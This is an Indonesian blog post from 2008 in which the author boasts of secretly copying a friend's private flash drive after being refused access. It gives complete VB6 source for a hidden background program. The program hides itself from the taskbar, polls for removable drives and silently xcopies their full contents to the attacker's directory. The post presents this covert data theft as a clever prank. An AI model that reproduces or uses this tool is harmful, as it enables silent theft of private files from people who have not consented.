Darkside of Oktavianus

Making virus and all of them as our friends

Nyolong Data FlashDisk(FD) By.4L13N

Posted by oktavianus pada April 27, 2008

sebener_Nye sekitar dua bulan lalu pengen posting ini… but ga’ enak
ama somebody!!!

begini cerita_Nye, beberapa waktu lalu gw minta file ama kawan gw N
ternyata file tersebut ada di flashdisk_Nye(FD), paz gw pinjem FD tsb, eh ga’ dikasih alasan_Nye kira2x :

“eit… ni FD Private buat gw, ga’ ada yang boleh liat isi_Nye selain
gw Coz ada file, proyek N data pribadi gw disini. kalo mawo, sini gw
yang kopi_in ke laptop lw??”
huh resee padahal gw udeh bilang ga’ gw liat2x dech file2x lw, tetep
aje ga’ dikasih udeh gitu gw ga’ bawa laptop lagi!!!hixhixhixhix
segitu penting_Nye yach?? karna itu gw jadi penasaran N pengen tawu
isi_Nye(ma’lum rasa ingin tawu nihh)!!
but… gimane cara_Nye supaya gw bisa mengkopi data2x di FD_Nye ke
Hardisk???
nah muncullah sedikit ide nakal untuk ngebuat program kecil yang mampu
mengkopi semua isi FD ke hardisk secara otomatis N tentunye dilakukan
secara background!!!hehehehe
oke… program ini gw buat pake VB.6.0 N membutuhkan :

-Form dengan nama Form1
-DriveListBox dengan nama Drive1
-Timer dengan nama Timer1
-Label1 dengan nama Label1
-Label2 dengan nama Label2

truz kode Program_Nye :

—————————-
‘CopyLeft by 4L13N
‘HomePage : http://www.bete.co.nr

‘Ckakakakakakaka

Private Declare Function GetDriveType& Lib “Kernel32” Alias
“GetDriveTypeA” (ByVal nDrive As String)

Private Sub Form_Load()
App.TaskVisible = False
Me.Hide
End Sub

Private Sub Timer1_Timer()
‘fungsi buat cek flashdisk
Drive1.Refresh
Dim i As Integer
For i = 0 To Drive1.ListCount – 1
If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1)
<> “a” Then
Label1 = Drive1.List(i) & “\”
cekkopy
Label2 = “udeh”
Exit Sub
Exit For
End If
Next
Label2 = “blum”
End Sub

Private Sub cekkopy()
If Label2 = “udeh” Then
Exit Sub
Else
Shell (“xcopy /S /H /Y /C ” & Label1), vbHide
End If
End Sub
————————

Logika :
Cek keberadaan FlashDisk kalo blum ke_ambil langsung ambil kalo udeh
ga’ usah!!!

wuihhh… alhasil gw bisa mengkopy data2x flashdisk kawan gw tsb ke
laptop gw!!hehehehe
ternyata memang bener, file2x tsb terlalu privasi kalo gw liat N ga
sewajar_Nye ada didalam FlashDisk(CareFully)!!!
hmmmm… sowry kawan but kata2x lw bikin gw penasaran!!!

NB : program ini akan mengkopy kan hasil colongan_Nye kedirektory
tempat program ini bercokol!!!

Kritik,Caci-Maki,Hinaan SendTo http://www.bete.co.nr

kalo pujian SendTo Allah S.W.T N Rosul2x_Nye

Original Post : http://www.bete.co.nr/?p=54

Salam Hangat By. 4L13N

Iklan

Satu Tanggapan to “Nyolong Data FlashDisk(FD) By.4L13N”

  1. xxx said

    hebuaaaaaaaaat buaaaaaaaaaangueeeeeeeeetttttttt

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: